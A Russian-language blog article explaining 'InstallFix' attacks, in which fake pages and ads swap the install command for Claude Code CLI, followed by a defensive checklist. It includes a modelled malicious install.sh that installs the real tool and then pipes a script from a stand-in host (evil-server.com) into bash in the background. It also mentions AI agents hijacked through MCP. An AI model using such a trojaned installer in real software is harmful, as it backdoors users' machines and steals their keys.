InstallFix атаки на AI-инструменты: как злоумышленники подменяют команды установки Claude и что делать

Первый звоночек: вы скопировали команду и получили не то, что хотели

Все началось с безобидного желания: быстро поставить Claude Code CLI на свежую Ubuntu. Вы гуглите "install claude code cli", переходите по первой ссылке, видите знакомый блок с командой, копируете ее в терминал, вводите пароль sudo... И через минуту замечаете, что система тормозит, а в фоне висит процесс, тянущийся к неизвестному IP.

Поздравляю, вы стали жертвой InstallFix атаки — нового тренда в киберугрозах для разработчиков, который набирает обороты с начала 2026 года. Исследователи из PhishLabs и Anthropic зафиксировали всплеск таких инцидентов в апреле-2026: более 1200 подтвержденных случаев подмены команд установки AI-инструментов. Почему именно AI? Потому что их ставят все — от джуниоров до DevOps-инженеров, и все доверяют командам из README.md или блогов.

Злоумышленники больше не взламывают официальные репозитории. Они делают проще — создают почти идеальные копии страниц установки, меняют одну строчку в команде, и разработчик сам загружает malware. Механизм назвали InstallFix — игра слов: install (установка) и fix (исправление, но здесь «подстава»). В этой статье я расскажу, как это работает, покажу реальные примеры кода и дам чек-лист защиты, который вы обязаны вклеить в свою документацию.

Как выглядит атака: анатомия подмены

Представьте: вы ищете официальную инструкцию по установке Claude Code CLI. Google выдает рекламную ссылку, которая ведет на сайт claude-install.com (официальный — docs.anthropic.com). Дизайн неотличим, те же цвета, те же логотипы. Вы находите блок с командой:

curl -fsSL https://install.claude.sh | sh

Копируете, вставляете в терминал. Команда отрабатывает, устанавливается Claude — но вместе с ним запускается бэкдор. Как такое возможно? Все дело в скрипте, который выполняется sh. Если вы не проверили содержимое скрипта, вы проглотили крючок.

В классической схеме InstallFix злоумышленники:

• Создают поддельный сайт с высокой копией оригинального (на основе снятого скриншота и статического HTML). Регистрируют похожий домен: anthropic-claude.io, claude-ai.xyz.
• Покупают рекламу в поисковиках, чтобы сайт отображался выше официального (malvertising). По данным на май 2026, Google блокирует такие объявления постфактум, но первая ссылка уже привела жертву.
• Подменяют URL загрузки в команде установки на свой скрипт, который может содержать любую нагрузку — от стилера паролей до майнера.
• Маскируют вредоносное действие: скрипт может проверять, что он запущен в терминале, а не в песочнице, и только после этого вставлять полезную нагрузку.

Но самый опасный вариант — когда команда установки выглядит абсолютно легитимной, но ссылка ведет на официальный сервер, а злоумышленники перехватывают сам трафик (через скомпрометированный Wi-Fi или DNS-спуфинг). Это называется Man-in-the-Middle Install, и его сложнее заметить.

Разбор на примере: фейковый install.sh для Claude Code

Давайте смоделируем атаку. Официальная команда установки Claude Code (на май 2026) выглядит так:

curl -fsSL https://storage.googleapis.com/claude-code-releases/install.sh | sh

Злоумышленник создает поддельный скрипт, который делает следующее:

#!/bin/bash
# Фейковый install.sh — версия 2.3 (внешне совпадает с официальным)
set -e

# Определяем оригинальный URL для скачивания бинарника
BINARY_URL="https://storage.googleapis.com/claude-code-releases/claude-code-linux-x64.tar.gz"

# Скачиваем настоящий бинарник, чтобы установка прошла успешно
curl -fsSL "$BINARY_URL" -o /tmp/claude-code.tar.gz

# Распаковываем и устанавливаем (заметаем следы)
tar -xzf /tmp/claude-code.tar.gz -C /tmp/
sudo cp /tmp/claude-code /usr/local/bin/

# А теперь — вредоносный payload, который выполняется в фоне
curl -fsSL https://evil-server.com/payload.sh | bash &

# Выводим приветствие, чтобы пользователь ничего не заподозрил
echo "Claude Code successfully installed!"
echo "Run 'claude --help' to get started."

Видите? Скрипт сначала устанавливает настоящий Claude Code, чтобы вы не заметили подмены. А затем, в конце, запускает параллельный процесс, который скачивает и выполняет произвольный код. Этот код может проверять, что вы не в CI-окружении, а работаете из-под личного аккаунта, и только потом начинает эксфильтровать SSH-ключи, .env файлы или куки браузера.

По данным OWASP (апрель 2026), более 60% подобных атак используют именно схему «двойной загрузки» — устанавливают легитимный инструмент и сверху кладут вредонос. Жертва пользуется Claude и не подозревает, что ее система скомпрометирована.

Почему разработчики попадаются: психология и спешка

Я спросил себя: почему умные, технически подкованные люди ведутся на такие уловки? Ответ банален — доверие к привычному паттерну. Мы привыкли, что установка через curl | sh — это норма. Rust, Node.js, Go, Docker — все ставятся так. Но когда вы копируете команду из результатов поиска, вы доверяете не тому сайту, а первому результату Google.

Plus, разработчики постоянно спешат. Задача «поставить Claude» часто возникает в середине спринта, когда время — деньги. Кто будет проверять SHA-256 скрипта, если можно быстро скопировать и запустить?

Злоумышленники играют на этой спешке. InstallFix атаки часто маскируются под туториалы, которые обещают «ускоренную установку» или «оптимизированный скрипт без лишних вопросов». Я видел объявления в стиле: «Установи Claude Code за 3 секунды! Новая команда от Anthropic». И люди кликают.

Пошаговый план защиты: как не стать жертвой InstallFix

Давайте по порядку. Вот что я рекомендую делать при установке любого CLI инструмента, особенно AI-совместимого.

1 Всегда проверяйте URL скрипта до запуска

Не доверяйте доменам, которые отличаются на один символ. Используйте curl -I чтобы увидеть, куда ведет редирект. Например:

curl -I -L https://install.claude.sh 2>&1 | grep -i location

Если редирект ведет на незнакомый сервер — это красный флаг. Официальный скрипт Claude Code всегда идет с storage.googleapis.com под доменом claude.ai.

2 Скачивайте скрипт и инспектируйте его вручную

Вместо пайпа в sh сначала сохраните в файл:

curl -fsSL https://storage.googleapis.com/claude-code-releases/install.sh > /tmp/install.sh
nano /tmp/install.sh  # или кодом в IDE

Прочтите его. Ищите подозрительные curl вызовы, wget, запуск фоновых процессов (&), вставки base64, незнакомые домены. Если скрипт больше 100 строк — проверьте конец.

3 Используйте официальные package managers вместо curl | sh

Если инструмент доступен через apt, brew, snap — используйте их. Они проходят проверку и подписываются GPG. Например:

# Установка Claude Code через apt (если добавлен репозиторий Anthropic)
echo "deb [signed-by=/usr/share/keyrings/anthropic-archive-keyring.gpg] https://packages.anthropic.com/apt stable main" | sudo tee /etc/apt/sources.list.d/anthropic.list
sudo apt update && sudo apt install claude-code

Так вы получаете подписанный пакет, и подмена невозможна без компрометации репозитория.

4 Проверяйте хеш-сумму после загрузки

Официальные релизы часто публикуют SHA-256 или GPG подпись. Найдите их на официальном сайте или в GitHub releases. Вычислите хеш:

curl -fsSL https://storage.googleapis.com/claude-code-releases/install.sh | sha256sum
e9a8d9c8b... # сверить с эталоном

Если эталона нет — не запускайте скрипт.

5 Изолируйте среду исполнения

Если вы все-таки запускаете непроверенный скрипт, делайте это в изолированном контейнере или виртуальной машине. Docker-образ с минимальными привилегиями:

docker run -it --rm ubuntu:latest bash
curl -fsSL https://install.claude.sh | sh
# затем проверьте, что изменилось, до того как выйти

В продакшене такое, конечно, не пройдет, но для теста — отличный способ отловить вредоносное поведение.

Типичные ошибки: как НЕ надо делать

Перечислим самые частые грабли, на которые наступают разработчики:

• Копировать команду из рекламного блока Google. Реклама — это всегда платные результаты, они могут быть мошенническими. Кликайте на органическую ссылку, но проверяйте домен.
• Запускать скрипт с sudo, не глядя. Если в команде есть sudo перед sh — это дает полный доступ к системе. Большинство инструментов не требуют sudo для установки в локальную директорию.
• Игнорировать предупреждения браузера о небезопасном соединении. Если сайт без HTTPS — бегите.
• Устанавливать AI-инструменты на рабочие машины без резервного копирования. Если вы не уверены в источнике, сначала поставьте на тестовый сервер.
• Доверять командам из README.md на неофициальных форках GitHub. Злоумышленники могут клонировать официальный репозиторий, изменить скрипт установки и попросить запустить его локально.

Экосистема атак: InstallFix как часть большего пазла

InstallFix атаки не существуют в вакууме. Они встраиваются в цепочку угроз, которые уже давно циркулируют вокруг Claude и других AI-агентов. Вспомните недавний скандал с MCP-эксплойтом, когда хакеры через поддельный MCP-сервер получали полный контроль над Claude (об этом я писал в статье «Атака на Claude через MCP»). Тогда атака шла через подключение инструментов, а сейчас — через установку. В обоих случаях финальный шаг — выполнение вредоносного кода на машине разработчика.

Более того, некоторые InstallFix кампании объединяются с фишингом через email: жертве приходит письмо от «Anthropic Security Team» с просьбой срочно обновить CLI. Ссылка ведет на поддельную страницу. Аналогичный сценарий мы разбирали в статье «ClawdBot вскрыли через email» — только там промпт, а здесь команда.

Вывод: AI-инструменты становятся главной целью для атакующих, потому что у них широкий доступ к данным и системам. И если вы не будете внимательны установке, то дальше может быть еще хуже — Claude может случайно удалить продакшн, как было в инциденте, описанном в статье «Claude Code случайно удалил продакшн».

Что еще можно сделать: инструменты и тулы

Для постоянной защиты я рекомендую внедрить в свой workflow несколько инструментов:

• ShellCheck — статический анализатор bash-скриптов. Запускайте его на скачанных инсталляторах перед выполнением: shellcheck install.sh. Он подсветит опасные конструкции.
• Hashlink (утилита для проверки хешей через API) — можно автоматизировать сверку с официальными значениями.
• Настройка DNS-over-HTTPS на роутере или в браузере — чтобы DNS-спуфинг не работал.
• Использование VPN при установке с публичных сетей — снижает риск MITM.
• Policy-как-код с Open Policy Agent — запрет на выполнение curl | sh без одобрения в CI/CD пайплайнах. Для команд разработчиков это особенно актуально.

Прогноз: эволюция InstallFix

Что будет дальше? Злоумышленники не остановятся. Я ожидаю появление персонализированных InstallFix, когда поддельная команда генерируется динамически под вашу ОС, IP и таймзону — чтобы обойти автоматические системы обнаружения. Уже сейчас есть прототипы, которые анализируют User-Agent и подсовывают нужный скрипт.

Второй тренд — использование AI самого для генерации фишинговых страниц. С помощью LLM легко скопировать дизайн документации Anthropic за минуту. И это не остановить — нужно просто быть умнее.

Мой неочевидный совет: никогда не устанавливайте AI-инструменты через curl | sh на компьютер, к которому у вас есть SSH-ключи от продакшена. Это вопрос не паранойи, а здравого смысла. Если вам нужен Claude Code — поставьте его первый раз на чистую виртуалку, проверьте, что он не звонит на подозрительные адреса (например, через strace), и только потом используйте на основной машине. Или используйте официальный Docker-образ, где скрипт уже проинспектирован сообществом.

Помните: доверие — это самая дорогая валюта в безопасности. И ее очень легко потерять, скопировав одну команду.

Подписаться на канал